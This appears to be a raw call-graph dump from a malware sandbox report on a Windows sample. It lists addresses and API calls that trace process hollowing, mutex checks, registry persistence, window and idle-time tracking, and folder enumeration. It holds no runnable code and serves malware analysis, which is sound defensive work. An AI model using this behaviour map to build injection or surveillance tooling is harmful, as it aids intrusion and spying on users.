53604->53617 53605->53604 53606 4182a1 53605->53606 53607 4182c1 NtMapViewOfSection 53606->53607 53608 4182b0 NtUnmapViewOfSection 53606->53608 53609 4182e5 VirtualFree NtClose TerminateProcess 53607->53609 53610 41832d GetCurrentProcess NtMapViewOfSection 53607->53610 53608->53607 53609->53598 53611 418328 53609->53611 53610->53604 53612 41835a _Yarn 53610->53612 53611->53617 53613 4183f6 WriteProcessMemory 53612->53613 53614 418419 Wow64SetThreadContext 53612->53614 53613->53604 53615 418415 53613->53615 53614->53604 53616 418432 ResumeThread 53614->53616 53615->53614 53616->53604 53616->53617 53617->53303 53619 4020df 11 API calls 53618->53619 53620 412adf 53619->53620 53621 4020df 11 API calls 53620->53621 53622 412aeb 53621->53622 53623 4020df 11 API calls 53622->53623 53645 412af7 53623->53645 53624 41b978 43 API calls 53624->53645 53625 40d9e8 32 API calls 53625->53645 53626 401fd8 11 API calls 53626->53645 53627 40417e 28 API calls 53627->53645 53628 4042fc 79 API calls 53628->53645 53629 40431d 28 API calls 53629->53645 53630 412c1d Sleep 53630->53645 53631 403014 28 API calls 53631->53645 53632 418568 31 API calls 53632->53645 53633 412cbf Sleep 53633->53645 53634 401f09 11 API calls 53634->53645 53635 412d61 Sleep 53635->53645 53636 412dc4 DeleteFileW 53636->53645 53637 41c485 32 API calls 53637->53645 53638 412dfb DeleteFileW 53638->53645 53639 412e4d Sleep 53639->53645 53640 412e37 DeleteFileW 53640->53645 53641 412ec6 53642 401f09 11 API calls 53641->53642 53643 412ed2 53642->53643 53644 401f09 11 API calls 53643->53644 53646 412ede 53644->53646 53645->53624 53645->53625 53645->53626 53645->53627 53645->53628 53645->53629 53645->53630 53645->53631 53645->53632 53645->53633 53645->53634 53645->53635 53645->53636 53645->53637 53645->53638 53645->53639 53645->53640 53645->53641 53648 412e92 Sleep 53645->53648 53647 401f09 11 API calls 53646->53647 53649 412eea 53647->53649 53650 401f09 11 API calls 53648->53650 53766 40b904 53649->53766 53656 412ea2 53650->53656 53652 412efd 53653 4020f6 28 API calls 53652->53653 53655 412f1d 53653->53655 53654 401f09 11 API calls 53654->53656 53772 41322d 53655->53772 53656->53645 53656->53654 53658 412ec4 53656->53658 53658->53649 53660 401f09 11 API calls 53661 412f34 53660->53661 53662 412f54 53661->53662 53663 4130a8 53661->53663 53665 41bd1e 28 API calls 53662->53665 53784 41bd1e 53663->53784 53667 412f60 53665->53667 53797 41bb8e 53667->53797 53668 402f31 28 API calls 53670 4130e8 53668->53670 53673 402f10 28 API calls 53670->53673 53671 412f7a 53672 402f31 28 API calls 53671->53672 53675 412faa 53672->53675 53674 4130f7 53673->53674 53676 402f10 28 API calls 53674->53676 53677 402f10 28 API calls 53675->53677 53678 413103 53676->53678 53679 412fb9 53677->53679 53680 402f10 28 API calls 53678->53680 53681 402f10 28 API calls 53679->53681 53682 413112 53680->53682 53683 412fc8 53681->53683 53684 402f10 28 API calls 53682->53684 53685 402f10 28 API calls 53683->53685 53686 413121 53684->53686 53687 412fd7 53685->53687 53688 402f10 28 API calls 53686->53688 53689 402f10 28 API calls 53687->53689 53690 413130 53688->53690 53691 412fe6 53689->53691 53692 402f10 28 API calls 53690->53692 53693 402f10 28 API calls 53691->53693 53694 41313f 53692->53694 53695 412ff2 53693->53695 53788 402ea1 53694->53788 53697 402f10 28 API calls 53695->53697 53699 412ffe 53697->53699 53701 402ea1 28 API calls 53699->53701 53700 404aa1 61 API calls 53702 413156 53700->53702 53703 41300d 53701->53703 53705 401fd8 11 API calls 53702->53705 53704 402f10 28 API calls 53703->53704 53707 413019 53704->53707 53706 413162 53705->53706 53708 401fd8 11 API calls 53706->53708 53709 402ea1 28 API calls 53707->53709 53710 41316e 53708->53710 53711 413023 53709->53711 53712 401fd8 11 API calls 53710->53712 53713 404aa1 61 API calls 53711->53713 53714 41317a 53712->53714 53715 413030 53713->53715 53716 401fd8 11 API calls 53714->53716 53717 401fd8 11 API calls 53715->53717 53718 413186 53716->53718 53719 413039 53717->53719 53720 401fd8 11 API calls 53718->53720 53721 401fd8 11 API calls 53719->53721 53722 41318f 53720->53722 53723 413042 53721->53723 53724 401fd8 11 API calls 53722->53724 53725 401fd8 11 API calls 53723->53725 53726 413198 53724->53726 53727 41304b 53725->53727 53728 401fd8 11 API calls 53726->53728 53729 401fd8 11 API calls 53727->53729 53730 41309c 53728->53730 53731 413054 53729->53731 53733 401fd8 11 API calls 53730->53733 53732 401fd8 11 API calls 53731->53732 53734 413060 53732->53734 53736 4131aa 53733->53736 53735 401fd8 11 API calls 53734->53735 53738 41306c 53735->53738 53737 401f09 11 API calls 53736->53737 53739 4131b6 53737->53739 53740 401fd8 11 API calls 53738->53740 53741 401fd8 11 API calls 53739->53741 53742 413078 53740->53742 53743 4131c2 53741->53743 53744 401fd8 11 API calls 53742->53744 53745 401fd8 11 API calls 53743->53745 53746 413084 53744->53746 53747 4131ce 53745->53747 53748 401fd8 11 API calls 53746->53748 53749 401fd8 11 API calls 53747->53749 53750 413090 53748->53750 53751 4131da 53749->53751 53752 401fd8 11 API calls 53750->53752 53753 401fd8 11 API calls 53751->53753 53752->53730 53754 4131e6 53753->53754 53755 401fd8 11 API calls 53754->53755 53756 4131f2 53755->53756 53757 401fd8 11 API calls 53756->53757 53758 4131fe 53757->53758 53759 401fd8 11 API calls 53758->53759 53760 41320a 53759->53760 53761 401fd8 11 API calls 53760->53761 53762 413216 53761->53762 53763 401fd8 11 API calls 53762->53763 53764 412a83 53763->53764 53765 404e26 99 API calls 53764->53765 53765->53332 53767 40b90c 53766->53767 53768 402252 11 API calls 53767->53768 53769 40b917 53768->53769 53802 40b92c 53769->53802 53771 40b926 53771->53652 53774 41326b 53772->53774 53776 41323c 53772->53776 53773 41327a 53775 40417e 28 API calls 53773->53775 53774->53773 53810 10001c5b 53774->53810 53778 413286 53775->53778 53814 411cf2 53776->53814 53780 401fd8 11 API calls 53778->53780 53782 412f28 53780->53782 53782->53660 53785 41bd2b 53784->53785 53786 4020b7 28 API calls 53785->53786 53787 4130b1 53786->53787 53787->53668 53789 402eb0 53788->53789 53790 402ef2 53789->53790 53795 402ee7 53789->53795 53791 401fb0 28 API calls 53790->53791 53792 402ef0 53791->53792 53793 402055 11 API calls 53792->53793 53794 402f09 53793->53794 53794->53700 53913 403365 28 API calls 53795->53913 53914 441e81 53797->53914 53800 402093 28 API calls 53801 41bbc0 53800->53801 53801->53671 53803 40b966 53802->53803 53804 40b938 53802->53804 53809 4028a4 22 API calls 53803->53809 53806 4027e6 28 API calls 53804->53806 53808 40b942 53806->53808 53808->53771 53811 10001c6b ___scrt_fastfail 53810->53811 53818 100012ee 53811->53818 53813 10001c87 53813->53773 53860 411cfe 53814->53860 53817 411f67 22 API calls _Yarn 53817->53774 53819 10001324 ___scrt_fastfail 53818->53819 53820 100013b7 GetEnvironmentVariableW 53819->53820 53844 100010f1 53820->53844 53823 100010f1 57 API calls 53824 10001465 53823->53824 53825 100010f1 57 API calls 53824->53825 53826 10001479 53825->53826 53827 100010f1 57 API calls 53826->53827 53828 1000148d 53827->53828 53829 100010f1 57 API calls 53828->53829 53830 100014a1 53829->53830 53831 100010f1 57 API calls 53830->53831 53832 100014b5 lstrlenW 53831->53832 53833 100014d2 53832->53833 53834 100014d9 lstrlenW 53832->53834 53833->53813 53835 100010f1 57 API calls 53834->53835 53836 10001501 lstrlenW lstrcatW 53835->53836 53837 100010f1 57 API calls 53836->53837 53838 10001539 lstrlenW lstrcatW 53837->53838 53839 100010f1 57 API calls 53838->53839 53840 1000156b lstrlenW lstrcatW 53839->53840 53841 100010f1 57 API calls 53840->53841 53842 1000159d lstrlenW lstrcatW 53841->53842 53843 100010f1 57 API calls 53842->53843 53843->53833 53845 10001118 ___scrt_fastfail 53844->53845 53846 10001129 lstrlenW 53845->53846 53857 10002c40 53846->53857 53849 10001177 lstrlenW FindFirstFileW 53851 100011a0 53849->53851 53852 100011e1 53849->53852 53850 10001168 lstrlenW 53850->53849 53853 100011c7 FindNextFileW 53851->53853 53854 100011aa 53851->53854 53852->53823 53853->53851 53856 100011da FindClose 53853->53856 53854->53853 53859 10001000 57 API calls ___scrt_fastfail 53854->53859 53856->53852 53858 10001148 lstrcatW lstrlenW 53857->53858 53858->53849 53858->53850 53859->53854 53893 41179c 53860->53893 53862 411d1c 53863 411d32 SetLastError 53862->53863 53864 41179c SetLastError 53862->53864 53890 411cfa 53862->53890 53863->53890 53865 411d4f 53864->53865 53865->53863 53867 411d71 GetNativeSystemInfo 53865->53867 53865->53890 53868 411db7 53867->53868 53880 411dc4 SetLastError 53868->53880 53896 411ca3 VirtualAlloc 53868->53896 53871 411de7 53872 411e0c GetProcessHeap HeapAlloc 53871->53872 53906 411ca3 VirtualAlloc 53871->53906 53874 411e23 53872->53874 53875 411e35 53872->53875 53907 411cba VirtualFree 53874->53907 53876 41179c SetLastError 53875->53876 53879 411e7e 53876->53879 53877 411dff 53877->53872 53877->53880 53881 411f30 53879->53881 53897 411ca3 VirtualAlloc 53879->53897 53880->53890 53908 412077 GetProcessHeap HeapFree 53881->53908 53884 411e97 _Yarn 53898 4117af SetLastError _Yarn ___scrt_get_show_window_mode 53884->53898 53886 411ec3 53886->53881 53899 411b5f 26 API calls 53886->53899 53888 411ef0 53888->53881 53900 41194f 53888->53900 53890->53817 53891 411efb 53891->53881 53891->53890 53892 411f25 SetLastError 53891->53892 53892->53881 53894 4117a0 SetLastError 53893->53894 53895 4117ab 53893->53895 53894->53862 53895->53862 53896->53871 53897->53884 53898->53886 53899->53888 53904 411975 53900->53904 53901 411a5e 53902 4118b2 VirtualProtect 53901->53902 53903 411a70 53902->53903 53903->53891 53904->53901 53904->53903 53909 4118b2 53904->53909 53906->53877 53907->53880 53908->53890 53910 4118c3 53909->53910 53912 4118bb 53909->53912 53911 411936 VirtualProtect 53910->53911 53910->53912 53911->53912 53912->53904 53913->53792 53915 441e8d 53914->53915 53918 441c7d 53915->53918 53917 41bbb2 53917->53800 53919 441c94 53918->53919 53921 441ccb _Atexit 53919->53921 53922 4405dd 20 API calls __dosmaperr 53919->53922 53921->53917 53922->53921 53923->53367 53925 4020f6 28 API calls 53924->53925 53926 415b0c SetEvent 53925->53926 53927 415b21 53926->53927 53928 4041a2 28 API calls 53927->53928 53929 415b3b 53928->53929 53930 4020f6 28 API calls 53929->53930 53931 415b4b 53930->53931 53932 4020f6 28 API calls 53931->53932 53933 415b5d 53932->53933 53934 41be1b 28 API calls 53933->53934 53935 415b66 53934->53935 53937 415b86 GetTickCount 53935->53937 53997 415ce5 53935->53997 54002 415cd6 53935->54002 53936 401e8d 11 API calls 53938 417092 53936->53938 53939 41bb8e 28 API calls 53937->53939 53941 401fd8 11 API calls 53938->53941 53942 415b97 53939->53942 53940 415cf9 54029 4050e4 84 API calls 53940->54029 53944 41709e 53941->53944 54003 41bae6 GetLastInputInfo GetTickCount 53942->54003 53947 401fd8 11 API calls 53944->53947 53946 415cc9 53946->54002 53949 4170aa 53947->53949 53948 415ba3 53950 41bb8e 28 API calls 53948->53950 53951 415bae 53950->53951 54004 41ba96 53951->54004 53954 41bd1e 28 API calls 53955 415bca 53954->53955 53956 401e65 22 API calls 53955->53956 53957 415bd8 53956->53957 53958 402f31 28 API calls 53957->53958 53959 415be6 53958->53959 53960 402ea1 28 API calls 53959->53960 53961 415bf5 53960->53961 53962 402f10 28 API calls 53961->53962 53963 415c04 53962->53963 53964 402ea1 28 API calls 53963->53964 53965 415c13 53964->53965 53966 402f10 28 API calls 53965->53966 53967 415c1f 53966->53967 53968 402ea1 28 API calls 53967->53968 53969 415c29 53968->53969 53970 404aa1 61 API calls 53969->53970 53971 415c38 53970->53971 53972 401fd8 11 API calls 53971->53972 53973 415c41 53972->53973 53974 401fd8 11 API calls 53973->53974 53975 415c4d 53974->53975 53976 401fd8 11 API calls 53975->53976 53977 415c59 53976->53977 53978 401fd8 11 API calls 53977->53978 53979 415c65 53978->53979 53980 401fd8 11 API calls 53979->53980 53981 415c71 53980->53981 53982 401fd8 11 API calls 53981->53982 53983 415c7d 53982->53983 53984 401f09 11 API calls 53983->53984 53985 415c86 53984->53985 53986 401fd8 11 API calls 53985->53986 53987 415c8f 53986->53987 53988 401fd8 11 API calls 53987->53988 53989 415c98 53988->53989 53990 401e65 22 API calls 53989->53990 53991 415ca3 53990->53991 54009 43baac 53991->54009 53994 415cb5 53998 415cc3 53994->53998 53999 415cce 53994->53999 53995 415cdb 53996 401e65 22 API calls 53995->53996 53996->53997 53997->53940 53997->54002 54013 404ff4 82 API calls 53998->54013 54014 404f51 53999->54014 54002->53936 54003->53948 54030 436e90 54004->54030 54007 40417e 28 API calls 54008 415bbc 54007->54008 54008->53954 54010 43bac5 _strftime 54009->54010 54032 43ae03 54010->54032 54012 415cb0 54012->53994 54012->53995 54013->53946 54015 404f65 54014->54015 54016 404fea 54014->54016 54017 404f6e 54015->54017 54018 404fc0 CreateEventA CreateThread 54015->54018 54019 404f7d GetLocalTime 54015->54019 54016->54002 54017->54018 54018->54016 54061 405150 54018->54061 54020 41bb8e 28 API calls 54019->54020 54021 404f91 54020->54021 54060 4052fd 28 API calls 54021->54060 54029->53946 54031 41bab5 GetForegroundWindow GetWindowTextW 54030->54031 54031->54007 54048 43ba0a 54032->54048 54034 43ae50 54054 43a7b7 36 API calls 3 library calls 54034->54054 54036 43ae15 54036->54034 54037 43ae2a 54036->54037 54039 43ae2f _Atexit 54036->54039 54053 4405dd 20 API calls __dosmaperr 54037->54053 54039->54012 54041 43ae5c 54042 43ae8b 54041->54042 54055 43ba4f 40 API calls __Tolower 54041->54055 54045 43aef7 54042->54045 54056 43b9b6 20 API calls 2 library calls 54042->54056 54057 43b9b6 20 API calls 2 library calls 54045->54057 54046 43afbe _strftime 54046->54039 54058 4405dd 20 API calls __dosmaperr 54046->54058 54049 43ba22 54048->54049 54050 43ba0f 54048->54050 54049->54036 54059 4405dd 20 API calls __dosmaperr 54050->54059 54052 43ba14 _Atexit 54052->54036 54053->54039 54054->54041 54055->54041 54056->54045 54057->54046 54058->54039 54059->54052 54064 40515c 102 API calls 54061->54064 54063 405159 54064->54063 54065->52898 54066->52896 54067 4165a0 54068 401e65 22 API calls 54067->54068 54069 4165b0 54068->54069 54070 4020f6 28 API calls 54069->54070 54071 4165bb 54070->54071 54072 401e65 22 API calls 54071->54072 54073 4165c6 54072->54073 54074 4020f6 28 API calls 54073->54074 54075 4165d1 54074->54075 54078 41292a 54075->54078 54079 40482d 3 API calls 54078->54079 54080 41293e 54079->54080 54081 4048c8 97 API calls 54080->54081 54082 412946 54081->54082 54083 402f31 28 API calls 54082->54083 54084 41295f 54083->54084 54085 402f10 28 API calls 54084->54085 54086 412969 54085->54086 54087 404aa1 61 API calls 54086->54087 54088 412973 54087->54088 54089 401fd8 11 API calls 54088->54089 54090 41297b 54089->54090 54091 404c10 273 API calls 54090->54091 54092 412989 54091->54092 54093 401fd8 11 API calls 54092->54093 54094 412991 54093->54094 54095 401fd8 11 API calls 54094->54095 54096 412999 54095->54096 54097 434887 54098 434893 ___BuildCatchObject 54097->54098 54124 434596 54098->54124 54100 43489a 54102 4348c3 54100->54102 54422 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54100->54422 54110 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54102->54110 54423 444251 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 54102->54423 54104 4348dc 54106 4348e2 ___BuildCatchObject 54104->54106 54424 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 54104->54424 54114 434962 54110->54114 54425 4433e7 36 API calls 4 library calls 54110->54425 54135 434b14 54114->54135 54117 434984 54118 43498e 54117->54118 54427 44341f 28 API calls _Atexit 54117->54427 54120 434997 54118->54120 54428 4433c2 28 API calls _Atexit 54118->54428 54429 43470d 13 API calls 2 library calls 54120->54429 54123 43499f 54123->54106 54125 43459f 54124->54125 54430 434c52 IsProcessorFeaturePresent 54125->54430 54127 4345ab 54431 438f31 10 API calls 4 library calls 54127->54431 54129 4345b0 54130 4345b4 54129->54130 54432 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54129->54432 54130->54100 54132 4345bd 54133 4345cb 54132->54133 54433 438f5a 8 API calls 3 library calls 54132->54433 54133->54100 54136 436e90 ___scrt_get_show_window_mode 54135->54136 54137 434b27 GetStartupInfoW 54136->54137 54138 434968 54137->54138 54139 4441a2 54138->54139 54434 44f059 54139->54434 54141 434971 54144 40e9c5 54141->54144 54142 4441ab 54142->54141 54438 446815 36 API calls 54142->54438 54440 41cb50 LoadLibraryA GetProcAddress 54144->54440 54146 40e9e1 GetModuleFileNameW 54445 40f3c3 54146->54445 54148 40e9fd 54149 4020f6 28 API calls 54148->54149 54150 40ea0c 54149->54150 54151 4020f6 28 API calls 54150->54151 54152 40ea1b 54151->54152 54153 41be1b 28 API calls 54152->54153 54154 40ea24 54153->54154 54460 40fb17 54154->54460 54156 40ea2d 54157 401e8d 11 API calls 54156->54157 54158 40ea36 54157->54158 54159 40ea93 54158->54159 54160 40ea49 54158->54160 54162 401e65 22 API calls 54159->54162 54649 40fbb3 118 API calls 54160->54649 54165 40eaa3 54162->54165 54163 40ea5b 54164 401e65 22 API calls 54163->54164 54166 40ea67 54164->54166 54167 401e65 22 API calls 54165->54167 54650 410f37 36 API calls __EH_prolog 54166->54650 54168 40eac2 54167->54168 54169 40531e 28 API calls 54168->54169 54171 40ead1 54169->54171 54173 406383 28 API calls 54171->54173 54172 40ea79 54651 40fb64 78 API calls 54172->54651 54175 40eadd 54173->54175 54177 401fe2 28 API calls 54175->54177 54176 40ea82 54652 40f3b0 71 API calls 54176->54652 54179 40eae9 54177->54179 54180 401fd8 11 API calls 54179->54180 54181 40eaf2 54180->54181 54183 401fd8 11 API calls 54181->54183 54182 401fd8 11 API calls 54184 40eefb 54182->54184 54185 40eafb 54183->54185 54426 4432f6 GetModuleHandleW 54184->54426 54186 401e65 22 API calls 54185->54186 54187 40eb04 54186->54187 54188 401fc0 28 API calls 54187->54188 54189 40eb0f 54188->54189 54190 401e65 22 API calls 54189->54190 54191 40eb28 54190->54191 54192 401e65 22 API calls 54191->54192 54193 40eb43 54192->54193 54194 40ebae 54193->54194 54653 406c1e 54193->54653 54195 401e65 22 API calls 54194->54195 54202 40ebbb 54195->54202 54197 40eb70 54198 401fe2 28 API calls 54197->54198 54199 40eb7c 54198->54199 54200 401fd8 11 API calls 54199->54200 54203 40eb85 54200->54203 54201 40ec02 54464 40d069 54201->54464 54202->54201 54207 413549 3 API calls 54202->54207 54658 413549 RegOpenKeyExA 54203->54658 54205 40ec08 54206 40ea8b 54205->54206 54467 41b2c3 54205->54467 54206->54182 54213 40ebe6 54207->54213 54211 40f34f 54693 4139a9 30 API calls 54211->54693 54212 40ec23 54215 40ec76 54212->54215 54484 407716 54212->54484 54213->54201 54661 4139a9 30 API calls 54213->54661 54216 401e65 22 API calls 54215->54216 54219 40ec7f 54216->54219 54228 40ec90 54219->54228 54229 40ec8b 54219->54229 54221 40f365 54694 412475 65 API calls ___scrt_get_show_window_mode 54221->54694 54222 40ec42 54662 407738 30 API calls 54222->54662 54223 40ec4c 54226 401e65 22 API calls 54223->54226 54238 40ec55 54226->54238 54227 40f36f 54231 41bc5e 28 API calls 54227->54231 54234 401e65 22 API calls 54228->54234 54665 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 54229->54665 54230 40ec47 54663 407260 98 API calls 54230->54663 54235 40f37f 54231->54235 54236 40ec99 54234->54236 54547 413a23 RegOpenKeyExW 54235->54547 54488 41bc5e 54236->54488 54238->54215 54241 40ec71 54238->54241 54240 40eca4 54243 401f13 28 API calls 54240->54243 54664 407260 98 API calls 54241->54664 54244 40ecaf 54243->54244 54247 401f09 11 API calls 54244->54247 54246 401f09 11 API calls 54248 40f39c 54246->54248 54249 40ecb8 54247->54249 54250 401f09 11 API calls 54248->54250 54251 401e65 22 API calls 54249->54251 54252 40f3a5 54250->54252 54253 40ecc1 54251->54253 54550 40dd42 54252->54550 54257 401e65 22 API calls 54253->54257 54259 40ecdb 54257->54259 54258 40f3af 54260 401e65 22 API calls 54259->54260 54261 40ecf5 54260->54261 54262 401e65 22 API calls 54261->54262 54264 40ed0e 54262->54264 54263 40ed7b 54266 40ed8a 54263->54266 54272 40ef06 ___scrt_get_show_window_mode 54263->54272 54264->54263 54265 401e65 22 API calls 54264->54265 54270 40ed23 _wcslen 54265->54270 54267 40ed93 54266->54267 54295 40ee0f ___scrt_get_show_window_mode 54266->54295 54268 401e65 22 API calls 54267->54268 54269 40ed9c 54268->54269 54271 401e65 22 API calls 54269->54271 54270->54263 54274 401e65 22 API calls 54270->54274 54273 40edae 54271->54273 54668 4136f8 RegOpenKeyExA 54272->54668 54277 401e65 22 API calls 54273->54277 54275 40ed3e 54274->54275 54279 401e65 22 API calls 54275->54279 54278 40edc0 54277->54278 54282 401e65 22 API calls 54278->54282 54280 40ed53 54279->54280 54284 40da34 32 API calls 54280->54284 54281 40ef51 54283 401e65 22 API calls 54281->54283 54285 40ede9 54282->54285 54286 40ef76 54283->54286 54287 40ed66 54284->54287 54291 401e65 22 API calls 54285->54291 54289 402093 28 API calls 54286->54289 54288 401f13 28 API calls 54287->54288 54290 40ed72 54288->54290 54292 40ef88 54289->54292 54293 401f09 11 API calls 54290->54293 54294 40edfa 54291->54294 54502 41376f RegCreateKeyA 54292->54502 54293->54263 54666 40cdf9 46 API calls _wcslen 54294->54666 54492 413947 54295->54492 54299 40ee0a 54299->54295 54301 40eea3 ctype 54304 401e65 22 API calls 54301->54304 54302 401e65 22 API calls 54303 40efaa 54302->54303 54306 43baac _strftime 40 API calls 54303->54306 54305 40eeba 54304->54305 54305->54281 54308 40eece 54305->54308 54307 40efb7 54306->54307 54309 40efc1 54307->54309 54310 40efe4 54307->54310 54311 401e65 22 API calls 54308->54311 54671 41cd9b 88 API calls ___scrt_get_show_window_mode 54309->54671 54314 402093 28 API calls 54310->54314 54312 40eed7 54311->54312 54315 41bc5e 28 API calls 54312->54315 54317 40eff9 54314->54317 54318 40eee3 54315->54318 54316 40efc8 CreateThread 54316->54310 55104 41d45d 10 API calls 54316->55104 54319 402093 28 API calls 54317->54319 54667 40f474 114 API calls 54318->54667 54321 40f008 54319->54321 54323 41b4ef 80 API calls 54321->54323 54322 40eee8 54322->54281 54324 40eeef 54322->54324 54325 40f00d 54323->54325 54324->54206 54326 401e65 22 API calls 54325->54326 54327 40f019 54326->54327 54328 401e65 22 API calls 54327->54328 54329 40f02b 54328->54329 54330 401e65 22 API calls 54329->54330 54331 40f04b 54330->54331 54332 43baac _strftime 40 API calls 54331->54332 54333 40f058 54332->54333 54334 401e65 22 API calls 54333->54334 54335 40f063 54334->54335 54336 401e65 22 API calls 54335->54336 54337 40f074 54336->54337 54338 401e65 22 API calls 54337->54338 54339 40f089 54338->54339 54340 401e65 22 API calls 54339->54340 54341 40f09a 54340->54341 54342 40f0a1 StrToIntA 54341->54342 54508 409de4 54342->54508 54345 401e65 22 API calls 54346 40f0bc 54345->54346 54347 40f101 54346->54347 54348 40f0c8 54346->54348 54351 401e65 22 API calls 54347->54351 54672 4344ea 54348->54672 54353 40f111 54351->54353 54352 401e65 22 API calls 54354 40f0e4 54352->54354 54356 40f159 54353->54356 54357 40f11d 54353->54357 54355 40f0eb CreateThread 54354->54355 54355->54347 55101 419fb4 110 API calls 2 library calls 54355->55101 54358 401e65 22 API calls 54356->54358 54359 4344ea new 22 API calls 54357->54359 54360 40f162 54358->54360 54361 40f126 54359->54361 54364 40f1cc 54360->54364 54365 40f16e 54360->54365 54362 401e65 22 API calls 54361->54362 54363 40f138 54362->54363 54366 40f13f CreateThread 54363->54366 54367 401e65 22 API calls 54364->54367 54368 401e65 22 API calls 54365->54368 54366->54356 55106 419fb4 110 API calls 2 library calls 54366->55106 54369 40f1d5 54367->54369 54370 40f17e 54368->54370 54371 40f1e1 54369->54371 54372 40f21a 54369->54372 54373 401e65 22 API calls 54370->54373 54375 401e65 22 API calls 54371->54375 54533 41b60d GetComputerNameExW GetUserNameW 54372->54533 54376 40f193 54373->54376 54378 40f1ea 54375->54378 54679 40d9e8 54376->54679 54382 401e65 22 API calls 54378->54382 54379 401f13 28 API calls 54381 40f22e 54379->54381 54384 401f09 11 API calls 54381->54384 54385 40f1ff 54382->54385 54387 40f237 54384->54387 54396 43baac _strftime 40 API calls 54385->54396 54386 401f13 28 API calls 54388 40f1b2 54386->54388 54389 40f240 SetProcessDEPPolicy 54387->54389 54390 40f243 CreateThread 54387->54390 54393 401f09 11 API calls 54388->54393 54389->54390 54391 40f264 54390->54391 54392 40f258 CreateThread 54390->54392 55074 40f7a7 54390->55074 54394 40f279 54391->54394 54395 40f26d CreateThread 54391->54395 54392->54391 55102 4120f7 146 API calls 54392->55102 54397 40f1bb CreateThread 54393->54397 54399 40f2cc 54394->54399 54401 402093 28 API calls 54394->54401 54395->54394 55103 4126db 38 API calls ___scrt_get_show_window_mode 54395->55103 54398 40f20c 54396->54398 54397->54364 55105 401be9 50 API calls _strftime 54397->55105 54690 40c162 7 API calls 54398->54690 54544 4134ff RegOpenKeyExA 54399->54544 54402 40f29c 54401->54402 54691 4052fd 28 API calls 54402->54691 54407 40f2ed 54409 41bc5e 28 API calls 54407->54409 54411 40f2fd 54409->54411 54692 41361b 31 API calls 54411->54692 54416 40f313 54417 401f09 11 API calls 54416->54417 54420 40f31e 54417->54420 54418 40f346 DeleteFileW 54419 40f34d 54418->54419 54418->54420 54419->54227 54420->54227 54420->54418 54421 40f334 Sleep 54420->54421 54421->54420 54422->54100 54423->54104 54424->54110 54425->54114 54426->54117 54427->54118 54428->54120 54429->54123 54430->54127 54431->54129 54432->54132 54433->54130 54435 44f062 54434->54435 54437 44f06b 54434->54437 54439 44ef58 49 API calls 5 library calls 54435->54439 54437->54142 54438->54142 54439->54437 54441 41cb8f LoadLibraryA GetProcAddress 54440->54441 54442 41cb7f GetModuleHandleA GetProcAddress 54440->54442 54443 41cbb8 44 API calls 54441->54443 54444 41cba8 LoadLibraryA GetProcAddress 54441->54444 54442->54441 54443->54146 54444->54443 54695 41b4a8 FindResourceA 54445->54695 54448 43bd51 _Yarn 21 API calls 54449 40f3ed _Yarn 54448->54449 54450 4020b7 28 API calls 54449->54450 54451 40f408 54450->54451 54452 401fe2 28 API calls 54451->54452 54453 40f413 54452->54453 54454 401fd8 11 API calls 54453->54454 54455 40f41c 54454->54455 54456 43bd51 _Yarn 21 API calls 54455->54456 54457 40f42d _Yarn 54456->54457 54698 406dd8 54457->54698 54459 40f460 54459->54148 54461 40fb23 54460->54461 54462 40fb2a 54460->54462 54701 402163 11 API calls 54461->54701 54462->54156 54702 401fab 54464->54702 54466 40d073 CreateMutexA GetLastError 54466->54205 54468 41bfb7 2 API calls 54467->54468 54469 41b2d1 54468->54469 54703 4135a6 RegOpenKeyExA 54469->54703 54472 401fe2 28 API calls 54473 41b2ff 54472->54473 54474 401fd8 11 API calls 54473->54474 54475 41b307 54474->54475 54476 4135a6 31 API calls 54475->54476 54479 41b35d 54475->54479 54477 41b330 54476->54477 54478 41b33b StrToIntA 54477->54478 54480 41b352 54478->54480 54481 41b349 54478->54481 54479->54212 54483 401fd8 11 API calls 54480->54483 54708 41cf69 22 API calls 54481->54708 54483->54479 54485 40772a 54484->54485 54486 413549 3 API calls 54485->54486 54487 407731 54486->54487 54487->54222 54487->54223 54489 41bc72 54488->54489 54490 40b904 28 API calls 54489->54490 54491 41bc7a 54490->54491 54491->54240 54493 413965 54492->54493 54494 406dd8 28 API calls 54493->54494 54495 41397a 54494->54495 54496 4020f6 28 API calls 54495->54496 54497 41398a 54496->54497 54498 41376f 14 API calls 54497->54498 54499 413994 54498->54499 54500 401fd8 11 API calls 54499->54500 54501 4139a1 54500->54501 54501->54301 54503 4137bf 54502->54503 54506 413788 54502->54506 54504 401fd8 11 API calls 54503->54504 54505 40ef9e 54504->54505 54505->54302 54507 41379a RegSetValueExA RegCloseKey 54506->54507 54507->54503 54509 409e02 _wcslen 54508->54509 54510 409e24 54509->54510 54511 409e0d 54509->54511 54513 40da34 32 API calls 54510->54513 54512 40da34 32 API calls 54511->54512 54514 409e15 54512->54514 54515 409e2c 54513->54515 54517 401f13 28 API calls 54514->54517 54516 401f13 28 API calls 54515->54516 54518 409e3a 54516->54518 54520 409e1f 54517->54520 54519 401f09 11 API calls 54518->54519 54521 409e42 54519->54521 54522 401f09 11 API calls 54520->54522 54724 40915b 28 API calls 54521->54724 54524 409e79 54522->54524 54709 40a109 54524->54709 54525 409e54 54725 403014 54525->54725 54530 401f13 28 API calls 54531 409e69 54530->54531 54532 401f09 11 API calls 54531->54532 54532->54520 54534 40417e 28 API calls 54533->54534 54535 41b65c 54534->54535 54904 4042fc 54535->54904 54538 403014 28 API calls 54539 41b672 54538->54539 54540 401f09 11 API calls 54539->54540 54541 41b67b 54540->54541 54542 401f09 11 API calls 54541->54542 54543 40f223 54542->54543 54543->54379 54545 413520 RegQueryValueExA RegCloseKey 54544->54545 54546 40f2e4 54544->54546 54545->54546 54546->54252 54546->54407 54548 40f392 54547->54548 54549 413a3f RegDeleteValueW 54547->54549 54548->54246 54549->54548 54551 40dd5b 54550->54551 54552 4134ff 3 API calls 54551->54552 54553 40dd62 54552->54553 54557 40dd81 54553->54557 54979 401707 54553->54979 54555 40dd6f 54982 413877 RegCreateKeyA 54555->54982 54558 414f2a 54557->54558 54559 4020df 11 API calls 54558->54559 54560 414f3e 54559->54560 54996 